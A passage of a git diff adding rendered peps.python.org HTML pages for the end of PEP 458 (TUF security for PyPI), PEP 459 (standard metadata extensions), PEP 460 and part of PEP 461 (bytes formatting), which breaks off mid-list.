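a real implementation would hash incrementally and handle very large trees):

import hashlib
import os

def tree_hashes(root):
    """Map each target file under root to the hex digest of its contents."""
    hashes = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as f:
                hashes[path] = hashlib.sha256(f.read()).hexdigest()
    return hashes

def detect_tampering(archived, current):
    # Any changed hash for a previously archived target file indicates an attack.
    return sorted(path for path, digest in current.items()
                  if path in archived and archived[path] != digest)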

+

As for attacks that serve different versions of metadata, or freeze a version +of a distribution at a specific version, they can be handled by TUF with techniques +like implicit key revocation and metadata mismatch detection [2].

+
+
+
+

Managing Future Changes to the Update Process

+

If breaking changes are made to the update process, PyPI should implement these +changes without disrupting existing clients. For general guidance on how to do +so, see the ongoing discussion in the TAP repository.

+

Note that the changes to PyPI from this PEP will be backwards compatible. The +location of target files and simple indices are not changed in this PEP, so any +existing PyPI clients will still be able to perform updates using these files. +This PEP adds the ability for clients to use TUF metadata to improve the +security of the update process.

+
+

Hash Algorithm Transition Plan

+

If the algorithm used to hash target and metadata files becomes vulnerable, it +SHOULD be replaced by a stronger hash algorithm.

+

The TUF metadata format allows digests from different hash algorithms to be
listed alongside each other, together with an algorithm identifier, so that
clients can seamlessly switch between algorithms.
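For illustration only (this snippet is modeled on the TUF targets metadata
format, not quoted from it), a target entry during such a transition might
list both digests side by side:

"targets": {
  "packages/foo-1.0.tar.gz": {
    "length": 1234,
    "hashes": {
      "sha256": "<digest using the old algorithm>",
      "blake2b-256": "<digest using the new algorithm>"
    }
  }
}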

+

However, once support for an old algorithm is turned off, clients that don’t +support the new algorithm will only be able to install or update packages, +including the client itself, by disabling TUF verification. To allow clients to +transition without temporarily losing TUF security guarantees, we recommend +the following procedure.

+
    +
  1. Implement the new algorithm in Warehouse.
  2. Regenerate existing, unexpired TUF metadata to include hashes using both
the old and new algorithms. All new metadata going forward shall list both
hash algorithms. Note that only TUF metadata that lists hash digests for
target files or other metadata needs to be renewed, that is, bin-n,
snapshot and timestamp. Thus, only online keys are required to sign the
renewed metadata.
  3. Announce the transition on high-visibility channels, such as packaging on
Python Discourse and the PyPI changes mailing list.
  4. Give popular clients such as pip and bandersnatch the chance to adopt the
new hash algorithm.
  5. Give end-users the chance to update clients.
  6. Get rough consensus from PyPI maintainers to remove the old hash algorithm.
  7. Remove Warehouse support for the old algorithm and only support the new
algorithm.
+
+
+
+

Appendix A: Repository Attacks Prevented by TUF

+
    +
  • Arbitrary software installation: An attacker installs anything it wants
on the client system. That is, an attacker can provide arbitrary files in
response to download requests and the files will not be detected as
illegitimate.
  • Rollback attacks: An attacker presents a software update system with
files older than those the client has already seen. This causes the client to
use outdated files.
  • Indefinite freeze attacks: An attacker continues to present a software
update system with the same files the client has already seen. The result is
that the client does not know that new files are available.
  • Endless data attacks: An attacker responds to a file download request
with an endless stream of data, causing harm to clients (e.g., a disk
partition filling up or memory exhaustion).
  • Slow retrieval attacks: An attacker responds to clients with a very slow
stream of data that essentially results in the client never continuing the
update process.
  • Extraneous dependencies attacks: An attacker indicates to clients that in
order to install the software they want, they also need to install
unrelated software. This unrelated software can be from a trusted source
but may have known vulnerabilities that are exploitable by the attacker.
  • Mix-and-match attacks: An attacker presents clients with a view of a
repository that includes files that never existed together on the repository
at the same time. This can result in, for example, outdated versions of
dependencies being installed.
  • Wrong software installation: An attacker provides a client with a trusted
file that is not the one the client wanted.
  • Malicious mirrors preventing updates: An attacker in control of one
repository mirror is able to prevent users from obtaining updates from
other, good mirrors.
  • Vulnerability to key compromises: An attacker who is able to compromise a
single key or less than a given threshold of keys can compromise clients.
This includes relying on a single online key, such as only being protected
by SSL, or a single offline key, as most software update systems use
to sign files.
+
+
+

References

+ +
+
+

Acknowledgements

+

This material is based upon work supported by the National Science Foundation +under Grants No. CNS-1345049 and CNS-0959138. Any opinions, findings, and +conclusions or recommendations expressed in this material are those of the +author(s) and do not necessarily reflect the views of the National Science +Foundation.

+

We thank Alyssa Coghlan, Daniel Holth, Donald Stufft, and the distutils-sig +community in general for helping us to think about how to usably and +efficiently integrate TUF with PyPI.

+

Roger Dingledine, Sebastian Hahn, Nick Mathewson, Martin Peck and Justin Samuel +helped us to design TUF from its predecessor, Thandy of the Tor project.

+

We appreciate the efforts of Konstantin Andrianov, Geremy Condra, Zane Fisher, +Justin Samuel, Tian Tian, Santiago Torres, John Ward, and Yuyu Zheng in +developing TUF.

+

Vladimir Diaz, Monzur Muhammad, Sai Teja Peddinti, Sumana Harihareswara, +Ee Durbin and Dustin Ingram helped us to review this PEP.

+

Zane Fisher helped us to review and transcribe this PEP.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0458.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0459/index.html b/pep-0459/index.html
new file mode 100644
index 00000000000..e6e0b686899
--- /dev/null
+++ b/pep-0459/index.html
@@ -0,0 +1,759 @@
PEP 459 – Standard Metadata Extensions for Python Software Packages | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 459 – Standard Metadata Extensions for Python Software Packages

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
BDFL-Delegate:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Requires:
+
426
+
Created:
+
11-Nov-2013
+
Post-History:
+
21-Dec-2013
+
+
+
+
Table of Contents +
+
+

PEP Withdrawal

+

This PEP depends on PEP 426, which has itself been withdrawn. See the +PEP Withdrawal section in that PEP for details.

+

In the meantime, metadata extensions will continue to be handled as they +have been for past examples like entry_points.txt: as additional files +installed into metadata directories alongside the main METADATA file.

+
+
+

Abstract

+

This PEP describes several standard extensions to the Python metadata.

+

Like all metadata extensions, each standard extension format is +independently versioned. Changing any of the formats requires an update +to this PEP, but does not require an update to the core packaging metadata.

+
+
+

Standard Extension Namespace

+

The python project on the Python Package Index refers to the CPython +reference interpreter. This namespace is used as the namespace for the +standard metadata extensions.

+

The currently defined standard extensions are:

+
    +
  • python.details
  • python.project
  • python.integrator
  • python.exports
  • python.commands
  • python.constraints
+

All standard extensions are currently at version 1.0, and thus the +extension_metadata field may be omitted without losing access to any +functionality.

+
+
+

The python.details extension

+

The python.details extension allows for more information to be provided +regarding the software distribution.

+

The python.details extension contains four custom subfields:

+
    +
  • license: the copyright license for the distribution
  • keywords: package index keywords for the distribution
  • classifiers: package index Trove classifiers for the distribution
  • document_names: the names of additional metadata files
+

All of these fields are optional. Automated tools MUST operate correctly if +a distribution does not provide them, including failing cleanly when an +operation depending on one of these fields is requested.

+
+

License

+

A short string summarising the license used for this distribution.

+

Note that distributions that provide this field should still specify any
applicable license Trove classifiers in the Classifiers field. Even
when an appropriate Trove classifier is available, the license summary can
be a good way to specify a particular version of that license, or to
indicate any variations or exceptions to the license.

+

This field SHOULD contain fewer than 512 characters and MUST contain fewer +than 2048.

+

This field SHOULD NOT contain any line breaks.

+

The full license text SHOULD be included as a separate file in the source +archive for the distribution. See Document names for details.

+

Example:

+
"license": "GPL version 3, excluding DRM provisions"
+
+
+
+
+

Keywords

+

A list of additional keywords to be used to assist searching for the +distribution in a larger catalog.

+

Example:

+
"keywords": ["comfy", "chair", "cushions", "too silly", "monty python"]
+
+
+
+
+

Classifiers

+

A list of strings, with each giving a single classification value +for the distribution. Classifiers are described in PEP 301 [2].

+

Example:

+
"classifiers": [
+  "Development Status :: 4 - Beta",
+  "Environment :: Console (Text Based)",
+  "License :: OSI Approved :: GNU General Public License v3 (GPLv3)"
+]
+
+
+
+
+

Document names

+

Filenames for supporting documents included in the distribution’s +dist-info metadata directory.

+

The following supporting documents can be named:

+
    +
  • description: a file containing a long description of the distribution
  • license: a file with the full text of the distribution’s license
  • changelog: a file describing changes made to the distribution
+

Supporting documents MUST be included directly in the dist-info +directory. Directory separators are NOT permitted in document names.

+

The markup format (if any) for the file is indicated by the file extension. +This allows index servers and other automated tools to render included +text documents correctly and provide feedback on rendering errors, rather +than having to guess the intended format.

+

If the filename has no extension, or the extension is not recognised, the +default rendering format MUST be plain text.

+

The following markup renderers SHOULD be used for the specified file +extensions:

+
    +
  • Plain text: .txt, no extension, unknown extension
  • reStructuredText: .rst
  • Markdown: .md
  • AsciiDoc: .adoc, .asc, .asciidoc
  • HTML: .html, .htm
+
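A minimal sketch of the selection rule just described (the renderer names are
illustrative placeholders):

import os

RENDERERS = {
    "": "plain text",          # no extension
    ".txt": "plain text",
    ".rst": "reStructuredText",
    ".md": "Markdown",
    ".adoc": "AsciiDoc",
    ".asc": "AsciiDoc",
    ".asciidoc": "AsciiDoc",
    ".html": "HTML",
    ".htm": "HTML",
}

def renderer_for(filename):
    extension = os.path.splitext(filename)[1].lower()
    # Unknown extensions fall back to plain text, as required above.
    return RENDERERS.get(extension, "plain text")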

Automated tools MAY render one or more of the specified formats as plain +text and MAY render other markup formats beyond those listed.

+

Automated tools SHOULD NOT make any assumptions regarding the maximum length +of supporting document content, except as necessary to protect the +integrity of a service.

+

Example:

+
"document_names": {
+    "description": "README.rst",
+    "license": "LICENSE.rst",
+    "changelog": "NEWS"
+}
+
+
+
+
+
+

The python.project extension

+

The python.project extension allows for more information to be provided +regarding the creation and maintenance of the distribution.

+

The python.project extension contains three custom subfields:

+
    +
  • contacts: key contact points for the distribution
  • contributors: other contributors to the distribution
  • project_urls: relevant URLs for the distribution
+
+

Contact information

+

Details on individuals and organisations are recorded as mappings with +the following subfields:

+
    +
  • name: the name of an individual or group
  • email: an email address (this may be a mailing list)
  • url: a URL (such as a profile page on a source code hosting service)
  • role: one of "author", "maintainer" or "contributor"
+

The name subfield is required, the other subfields are optional.

+

If no specific role is stated, the default is contributor.

+

Email addresses must be in the form local-part@domain where the +local-part may be up to 64 characters long and the entire email address +contains no more than 254 characters. The formal specification of the +format is in RFC 5322 (sections 3.2.3 and 3.4.1) and RFC 5321, with a more +readable form given in the informational RFC 3696 and the associated errata.

+

The defined contributor roles are as follows:

+
    +
  • author: the original creator of a distribution
  • maintainer: the current lead contributor for a distribution, when
they are not the original creator
  • contributor: any other individuals or organizations involved in the
creation of the distribution
+

Contact and contributor metadata is optional. Automated tools MUST operate +correctly if a distribution does not provide it, including failing cleanly +when an operation depending on one of these fields is requested.

+
+
+

Contacts

+

A list of contributor entries giving the recommended contact points for +getting more information about the project.

+

The example below would be suitable for a project that was in the process +of handing over from the original author to a new lead maintainer, while +operating as part of a larger development group.

+

Example:

+
"contacts": [
+  {
+    "name": "Python Packaging Authority/Distutils-SIG",
+    "email": "distutils-sig@python.org",
+    "url": "https://bitbucket.org/pypa/"
+  },
+  {
+    "name": "Samantha C.",
+    "role": "maintainer",
+    "email": "dontblameme@example.org"
+  },
+  {
+    "name": "Charlotte C.",
+    "role": "author",
+    "email": "iambecomingasketchcomedian@example.com"
+  }
+]
+
+
+
+
+

Contributors

+

A list of contributor entries for other contributors not already listed as +current project points of contact. The subfields within the list elements +are the same as those for the main contact field.

+

Example:

+
"contributors": [
+  {"name": "John C."},
+  {"name": "Erik I."},
+  {"name": "Terry G."},
+  {"name": "Mike P."},
+  {"name": "Graeme C."},
+  {"name": "Terry J."}
+]
+
+
+
+
+

Project URLs

+

A mapping of arbitrary text labels to additional URLs relevant to the +project.

+

While projects are free to choose their own labels and specific URLs, +it is RECOMMENDED that home page, source control, issue tracker and +documentation links be provided using the labels in the example below.

+

URL labels MUST be treated as case insensitive by automated tools, but they +are not required to be valid Python identifiers. Any legal JSON string is +permitted as a URL label.

+

Example:

+
"project_urls": {
+  "Documentation": "https://distlib.readthedocs.org",
+  "Home": "https://bitbucket.org/pypa/distlib",
+  "Repository": "https://bitbucket.org/pypa/distlib/src",
+  "Tracker": "https://bitbucket.org/pypa/distlib/issues"
+}
+
+
+
+
+
+

The python.integrator extension

+

Structurally, this extension is largely identical to the python.project +extension (the extension name is the only difference).

+

However, where the project metadata refers to the upstream creators +of the software, the integrator metadata refers to the downstream +redistributor of a modified version.

+

If the software is being redistributed unmodified, then typically this +extension will not be used. However, if the software has been patched (for +example, backporting compatible fixes from a later version, or addressing +a platform compatibility issue), then this extension SHOULD be used, and +a local version label added to the distribution’s version identifier.

+

If there are multiple redistributors in the chain, each one just overwrites +this extension with their particular metadata.

+
+
+

The python.exports extension

+

Most Python distributions expose packages and modules for import through +the Python module namespace. Distributions may also expose other +interfaces when installed.

+

The python.exports extension contains three custom subfields:

+
    +
  • modules: modules exported by the distribution
  • namespaces: namespace packages that the distribution contributes to
  • exports: other Python interfaces exported by the distribution
+
+

Export specifiers

+

An export specifier is a string consisting of a fully qualified name, as +well as an optional extra name enclosed in square brackets. This gives the +following four possible forms for an export specifier:

+
module
+module:name
+module[requires_extra]
+module:name[requires_extra]
+
+
+
+

Note

+

The jsonschema file currently restricts qualified names using the +Python 2 ASCII identifier rules. This may need to be reconsidered +given the more relaxed identifier rules in Python 3.

+
+

The meaning of the subfields is as follows:

+
    +
  • module: the module providing the export
  • name: if applicable, the qualified name of the export within the module
  • requires_extra: indicates the export will only work correctly if the
additional dependencies named in the given extra are available in the
installed environment
+
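A small, non-normative sketch that splits an export specifier into the
subfields described above:

import re

_EXPORT_SPECIFIER = re.compile(
    r"^(?P<module>[\w.]+)"                    # fully qualified module name
    r"(?::(?P<name>[\w.]+))?"                 # optional qualified name
    r"(?:\[(?P<requires_extra>[\w.-]+)\])?$"  # optional extra name
)

def parse_export_specifier(specifier):
    match = _EXPORT_SPECIFIER.match(specifier)
    if match is None:
        raise ValueError("invalid export specifier: %r" % specifier)
    return match.groupdict()

# parse_export_specifier("chair:NosePlugin")
#   -> {'module': 'chair', 'name': 'NosePlugin', 'requires_extra': None}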
+

Note

+

I tried this as a mapping with subfields, and it made the examples below +unreadable. While this PEP is mostly for tool use, readability still +matters to some degree for debugging purposes, and because I expect +snippets of the format to be reused elsewhere.

+
+
+
+

Modules

+

A list of qualified names of modules and packages that the distribution +provides for import.

+
+

Note

+

The jsonschema file currently restricts qualified names using the +Python 2 ASCII identifier rules. This may need to be reconsidered +given the more relaxed identifier rules in Python 3.

+
+

For names that contain dots, the portion of the name before the final dot +MUST appear either in the installed module list or in the namespace package +list.

+

To help avoid name conflicts, it is RECOMMENDED that distributions provide
a single top level module or package that matches the distribution name
(or a lower case equivalent). This requires that the distribution name also
meet the requirements of a Python identifier, which are stricter than
those for distribution names. This practice will also make it easier to
find authoritative sources for modules.

+

Index servers SHOULD allow multiple distributions to publish the same +modules, but MAY notify distribution authors of potential conflicts.

+

Installation tools SHOULD report an error when asked to install a +distribution that provides a module that is also provided by a different, +previously installed, distribution.

+

Note that attempting to import some declared modules may result in an +exception if the appropriate extras are not installed.

+

Example:

+
"modules": ["chair", "chair.cushions", "python_sketches.nobody_expects"]
+
+
+
+

Note

+

Making this a list of export specifiers instead would allow a distribution +to declare when a particular module requires a particular extra in order +to run correctly. On the other hand, there’s an argument to be made that +that is the point where it starts to become worthwhile to split out a +separate distribution rather than using extras.

+
+
+
+

Namespaces

+

A list of qualified names of namespace packages that the distribution +contributes modules to.

+
+

Note

+

The jsonschema file currently restricts qualified names using the +Python 2 ASCII identifier rules. This may need to be reconsidered +given the more relaxed identifier rules in Python 3.

+
+

On versions of Python prior to Python 3.3 (which provides native namespace +package support), installation tools SHOULD emit a suitable __init__.py +file to properly initialise the namespace rather than using a distribution +provided file.

+

Installation tools SHOULD emit a warning and MAY emit an error if a +distribution declares a namespace package that conflicts with the name of +an already installed module or vice-versa.

+

Example:

+
"namespaces": ["python_sketches"]
+
+
+
+
+

Exports

+

The exports field is a mapping containing prefixed names as keys. Each +key identifies an export group containing one or more exports published by +the distribution.

+

Export group names are defined by distributions that will then make use of +the published export information in some way. The primary use case is for +distributions that support a plugin model: defining an export group allows +other distributions to indicate which plugins they provide, how they +can be imported and accessed, and which additional dependencies (if any) +are needed for the plugin to work correctly.

+

To reduce the chance of name conflicts, export group names SHOULD use a +prefix that corresponds to a module name in the distribution that defines +the meaning of the export group. This practice will also make it easier to +find authoritative documentation for export groups.

+

Each individual export group is then a mapping of arbitrary non-empty string +keys to export specifiers. The meaning of export names within an export +group is up to the distribution that defines the export group. Creating an +appropriate definition for the export name format can allow the importing +distribution to determine whether or not an export is relevant without +needing to import every exporting module.

+

Example:

+
"exports": {
+  "nose.plugins.0.10": {
+    "chairtest": "chair:NosePlugin"
+  }
+}
+
+
+
+
+
+

The python.commands extension

+

The python.commands extension contains three custom subfields:

+
    +
  • wrap_console: console wrapper scripts to be generated by the installer
  • wrap_gui: GUI wrapper scripts to be generated by the installer
  • prebuilt: scripts created by the distribution’s build process and
installed directly to the configured scripts directory
+

wrap_console and wrap_gui are both mappings of script names to +export specifiers. The script names must follow the same naming rules as +distribution names.

+

The export specifiers for wrapper scripts must refer to either a package +with a __main__ submodule (if no name subfield is given in the export +specifier) or else to a callable inside the named module.

+

Installation tools should generate appropriate wrappers as part of the +installation process.
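As a rough illustration only (the exact wrapper format is deliberately left
unspecified here), an installer might generate something like the following
for a hypothetical wrap_console entry {"chair": "chair:run_cli"}:

#!/usr/bin/env python3
# Hypothetical generated wrapper for {"chair": "chair:run_cli"}
import sys
from chair import run_cli

if __name__ == "__main__":
    sys.exit(run_cli())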

+
+

Note

+

Still needs more detail on what “appropriate wrappers” means. For now, +refer to what setuptools and zc.buildout generate as wrapper scripts.

+
+

prebuilt is a list of script paths, relative to the scripts directory in
a wheel file or following installation. They are provided for informational
purposes only - installing them is handled through the normal processes for
files created when building a distribution.

+

Build tools SHOULD mark this extension as requiring handling by installers.

+

Index servers SHOULD allow multiple distributions to publish the same +commands, but MAY notify distribution authors of potential conflicts.

+

Installation tools SHOULD report an error when asked to install a +distribution that provides a command that is also provided by a different, +previously installed, distribution.

+

Example:

+
"python.commands": {
+  "installer_must_handle": true,
+  "wrap_console": [{"chair": "chair:run_cli"}],
+  "wrap_gui": [{"chair-gui": "chair:run_gui"}],
+  "prebuilt": ["reduniforms"]
+}
+
+
+
+
+

The python.constraints extension

+

The python.constraints extension contains two custom subfields:

+
    +
  • environments: supported installation environments
  • extension_metadata: required exact matches in extension metadata
fields published by other installed components
+

Build tools SHOULD mark this extension as requiring handling by installers.

+

Index servers SHOULD allow distributions to be uploaded with constraints +that cannot be satisfied using that index, but MAY notify distribution +authors of any such potential compatibility issues.

+

Installation tools SHOULD report an error if constraints are specified by +the distribution and the target installation environment fails to satisfy +them, MUST at least emit a warning, and MAY allow the user to +force the installation to proceed regardless.

+

Example:

+
"python.constraints": {
+  "installer_must_handle": true,
+  "environments": ["python_version >= 2.6"],
+  "extension_metadata": {
+    "fortranlib": {
+      "fortranlib.compatibility": {
+        "fortran_abi": "openblas-g77"
+      }
+    }
+  }
+}
+
+
+
+

Supported Environments

+

The environments subfield is a list of strings specifying the +environments that the distribution explicitly supports. An environment is +considered supported if it matches at least one of the environment markers +given.

+

If this field is not given in the metadata, it is assumed that the +distribution supports any platform supported by Python.

+

Individual entries are environment markers, as described in PEP 426.
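A sketch of the "supported if at least one marker matches" rule, using the
third-party packaging library's marker evaluation (an assumption for
illustration; PEP 426 markers differ in detail from the modern PEP 508
markers that packaging implements):

from packaging.markers import Marker

def environment_supported(environments):
    # A distribution with no "environments" field supports any platform
    # supported by Python.
    if not environments:
        return True
    # Supported if at least one of the markers matches this environment.
    return any(Marker(marker).evaluate() for marker in environments)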

+

The two main uses of this field are to declare which versions of Python +and which underlying operating systems are supported.

+

Examples indicating supported Python versions:

+
# Supports Python 2.6+
+"environments": ["python_version >= '2.6'"]
+
+# Supports Python 2.6+ (for 2.x) or 3.3+ (for 3.x)
+"environments": ["python_version >= '3.3'",
+                 "'3.0' > python_version >= '2.6'"]
+
+
+

Examples indicating supported operating systems:

+
# Windows only
+"environments": ["sys_platform == 'win32'"]
+
+# Anything except Windows
+"environments": ["sys_platform != 'win32'"]
+
+# Linux or BSD only
+"environments": ["'linux' in sys_platform",
+                 "'bsd' in sys_platform"]
+
+
+

Example where the supported Python version varies by platform:

+
# The standard library's os module has long supported atomic renaming
+# on POSIX systems, but only gained atomic renaming on Windows in Python
+# 3.3. A distribution that needs atomic renaming support for reliable
+# operation might declare the following supported environments.
+"environment": ["python_version >= '2.6' and sys_platform != 'win32'",
+                "python_version >= '3.3' and sys_platform == 'win32'"]
+
+
+
+
+

Extension metadata constraints

+

The extension_metadata subfield is a mapping from distribution names +to extension metadata snippets that are expected to exactly match the +metadata of the named distribution in the target installation environment.

+

Each submapping then consists of a mapping from metadata extension names to +the exact expected values of a subset of fields.

+

For example, a distribution called fortranlib may publish a different +FORTRAN ABI depending on how it is built, and any related projects that are +installed into the same runtime environment should use matching build +options. This can be handled by having the base distribution publish a +custom extension that indicates the build option that was used to create +the binary extensions:

+
"extensions": {
+  "fortranlib.compatibility": {
+    "fortran_abi": "openblas-g77"
+  }
+}
+
+
+

Other distributions that contain binary extensions that need to be compatible +with the base distribution would then define a suitable constraint in their +own metadata:

+
"python.constraints": {
+  "installer_must_handle": true,
+  "extension_metadata": {
+    "fortranlib": {
+      "fortranlib.compatibility": {
+        "fortran_abi": "openblas-g77"
+      }
+    }
+  }
+}
+
+
+

This constraint specifies that:

+
    +
  • fortranlib must be installed (this should also be expressed as a
normal dependency so that installers ensure it is satisfied)
  • The installed version of fortranlib must include the custom
fortranlib.compatibility extension in its published metadata
  • The fortran_abi subfield of that extension must have the exact
value openblas-g77.
+

If all of these conditions are met (the distribution is installed, the +specified extension is included in the metadata, the specified subfields +have the exact specified value), then the constraint is considered to be +satisfied.

+
+

Note

+

The primary intended use case here is allowing C extensions with additional +ABI compatibility requirements to declare those in a way that any +installation tool can enforce without needing to understand the details. +In particular, many NumPy based scientific libraries need to be built +using a consistent set of FORTRAN libraries, hence the “fortranlib” +example.

+

This is the reason there’s no support for pattern matching or boolean +logic: even the “simple” version of this extension is relatively +complex, and there’s currently no compelling rationale for making it +more complicated than it already is.

+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0459.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0460/index.html b/pep-0460/index.html
new file mode 100644
index 00000000000..21ada71610a
--- /dev/null
+++ b/pep-0460/index.html
@@ -0,0 +1,284 @@
PEP 460 – Add binary interpolation and formatting | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 460 – Add binary interpolation and formatting

+
+
Author:
+
Antoine Pitrou <solipsis at pitrou.net>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
06-Jan-2014
+
Python-Version:
+
3.5
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes to add minimal formatting operations to bytes and +bytearray objects. The proposed additions are:

+
    +
  • bytes % ... and bytearray % ... for percent-formatting,
similar in syntax to percent-formatting on str objects
(accepting a single object, a tuple or a dict).
  • bytes.format(...) and bytearray.format(...) for formatting
similar in syntax to str.format() (accepting positional as well as
keyword arguments).
  • bytes.format_map(...) and bytearray.format_map(...) for an
API similar to str.format_map(...), with the same formatting
syntax and semantics as bytes.format() and bytearray.format().
+
+
+

Rationale

+

In Python 2, str % args and str.format(args) allow the formatting +and interpolation of bytestrings. This feature has commonly been used +for the assembling of protocol messages when protocols are known to use +a fixed encoding.

+

Python 3 generally mandates that text be stored and manipulated as unicode
(i.e. str objects, not bytes). In some cases, though, it makes
sense to manipulate bytes objects directly. Typical usage is binary
network protocols, where one may want to interpolate and assemble several
bytes objects (some of them literals, some of them computed) to produce
complete protocol messages. For example, protocols such as HTTP or SIP
have headers with ASCII names and opaque “textual” values using a varying
and/or sometimes ill-defined encoding. Moreover, those headers can be
followed by a binary body… which can be chunked and decorated with ASCII
headers and trailers!

+

While there are reasonably efficient ways to accumulate binary data +(such as using a bytearray object, the bytes.join method or +even io.BytesIO), none of them leads to the kind of readable and +intuitive code that is produced by a %-formatted or {}-formatted template +and a formatting operation.
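For comparison, an illustrative fragment (not taken from any particular
project) of the accumulation style referred to here:

body = b"<payload>"
message = b"".join([
    b"Content-Length: ",
    str(len(body)).encode("ascii"),  # the length as ASCII digits
    b"\r\n\r\n",
    body,
])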

+
+
+

Binary formatting features

+
+

Supported features

+

In this proposal, percent-formatting for bytes and bytearray +supports the following features:

+
    +
  • Looking up formatting arguments by position as well as by name (i.e.,
%s as well as %(name)s).
  • %s will try to get a Py_buffer on the given value, and fall back
on calling __bytes__. The resulting binary data is inserted at
the given point in the string. This is expected to work with bytes,
bytearray and memoryview objects (as well as a couple of others such
as pathlib’s path objects).
  • %c will accept an integer between 0 and 255, and insert a byte of the
given value.
+

Braces-formatting for bytes and bytearray supports the following +features:

+
    +
  • All the kinds of argument lookup supported by str.format() (explicit
positional lookup, auto-incremented positional lookup, keyword lookup,
attribute lookup, etc.)
  • Insertion of binary data when no modifier or layout is specified
(e.g. {}, {0}, {name}). This has the same semantics as
%s for percent-formatting (see above).
  • The c modifier will accept an integer between 0 and 255, and insert a
byte of the given value (same as %c above).
+
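Illustrative usage under the proposed semantics (hypothetical snippets;
bytes.format() was never added to Python, so these are not guaranteed to run
on any released version):

# Percent-formatting, with positional and named lookup:
b"%s %s\r\n" % (b"GET", b"/index.html")
b"Host: %(host)s\r\n" % {b"host": b"example.org"}

# Braces-formatting, as proposed:
b"{}: {}\r\n".format(b"Content-Type", b"text/plain")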
+
+

Unsupported features

+

All other features present in formatting of str objects (either +through the percent operator or the str.format() method) are +unsupported. Those features imply treating the recipient of the +operator or method as text, which goes counter to the text / bytes +separation (for example, accepting %d as a format code would imply +that the bytes object really is an ASCII-compatible text string).

+

Amongst those unsupported features are not only most type-specific +format codes, but also the various layout specifiers such as padding +or alignment. Besides, str objects are not acceptable as arguments +to the formatting operations, even when using e.g. the %s format code.

+

__format__ isn’t called.

+
+
+
+

Criticisms

+
    +
  • The development cost and maintenance cost.
  • In 3.3 encoding to ASCII or latin-1 is as fast as memcpy (but it still
creates a separate object).
  • Developers will have to work around the lack of binary formatting anyway,
if they want to support Python 3.4 and earlier.
  • bytes.join() is consistently faster than format to join bytes strings
(XXX is it?).
  • Formatting functions could be implemented in a third party module,
rather than added to builtin types.
+
+
+

Other proposals

+
+

A new type datatype

+

It was proposed to create a new datatype specialized for “network +programming”. The authors of this PEP believe this is counter-productive. +Python 3 already has several major types dedicated to manipulation of +binary data: bytes, bytearray, memoryview, io.BytesIO.

+

Adding yet another type would make things more confusing for users, and +interoperability between libraries more painful (also potentially +sub-optimal, due to the necessary conversions).

+

Moreover, not one type would be needed, but two: one immutable type (to +allow for hashing), and one mutable type (as efficient accumulation is +often necessary when working with network messages).

+
+
+
+

Resolution

+

This PEP is made obsolete by the acceptance +of PEP 461, which introduces a more extended formatting language for +bytes objects in conjunction with the modulo operator.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0460.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0461/index.html b/pep-0461/index.html
new file mode 100644
index 00000000000..4edc2f0c2d7
--- /dev/null
+++ b/pep-0461/index.html
@@ -0,0 +1,364 @@
PEP 461 – Adding % formatting to bytes and bytearray | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 461 – Adding % formatting to bytes and bytearray

+
+
Author:
+
Ethan Furman <ethan at stoneleaf.us>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
13-Jan-2014
+
Python-Version:
+
3.5
+
Post-History:
+
14-Jan-2014, 15-Jan-2014, 17-Jan-2014, 22-Feb-2014, 25-Mar-2014, +27-Mar-2014
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes adding % formatting operations similar to Python 2’s str +type to bytes and bytearray [1] [2].

+
+
+

Rationale

+

While interpolation is usually thought of as a string operation, there are +cases where interpolation on bytes or bytearrays make sense, and the +work needed to make up for this missing functionality detracts from the overall +readability of the code.

+
+
+

Motivation

+

With Python 3 and the split between str and bytes, one small but +important area of programming became slightly more difficult, and much more +painful – wire format protocols [3].

+

This area of programming is characterized by a mixture of binary data and +ASCII compatible segments of text (aka ASCII-encoded text). Bringing back a +restricted %-interpolation for bytes and bytearray will aid both in +writing new wire format code, and in porting Python 2 wire format code.

+

Common use-cases include dbf and pdf file formats, email +formats, and FTP and HTTP communications, among many others.

+
+
+

Proposed semantics for bytes and bytearray formatting

+
+

%-interpolation

+

All the numeric formatting codes (d, i, o, u, x, X, +e, E, f, F, g, G, and any that are subsequently added +to Python 3) will be supported, and will work as they do for str, including +the padding, justification and other related modifiers (currently #, 0, +-, space, and + (plus any added to Python 3)). The only +non-numeric codes allowed are c, b, a, and s (which is a +synonym for b).

+

For the numeric codes, the only difference between str and bytes (or +bytearray) interpolation is that the results from these codes will be +ASCII-encoded text, not unicode. In other words, for any numeric formatting +code %x:

+
b"%x" % val
+
+
+

is equivalent to:

+
("%x" % val).encode("ascii")
+
+
+

Examples:

+
>>> b'%4x' % 10
+b'   a'
+
+>>> b'%#4x' % 10
+b' 0xa'
+
+>>> b'%04X' % 10
+b'000A'
+
+
+

%c will insert a single byte, either from an int in range(256), or from +a bytes argument of length 1, not from a str.

+

Examples:

+
>>> b'%c' % 48
+b'0'
+
+>>> b'%c' % b'a'
+b'a'
+
+
+

%b will insert a series of bytes. These bytes are collected in one of two +ways:

+
    +
  • input type supports Py_buffer [4]? Use it to collect the necessary bytes.
  • input type is something else? Use its __bytes__ method [5]; if there
isn’t one, raise a TypeError.
+

In particular, %b will not accept numbers nor str. str is rejected +as the string to bytes conversion requires an encoding, and we are refusing to +guess; numbers are rejected because:

+
    +
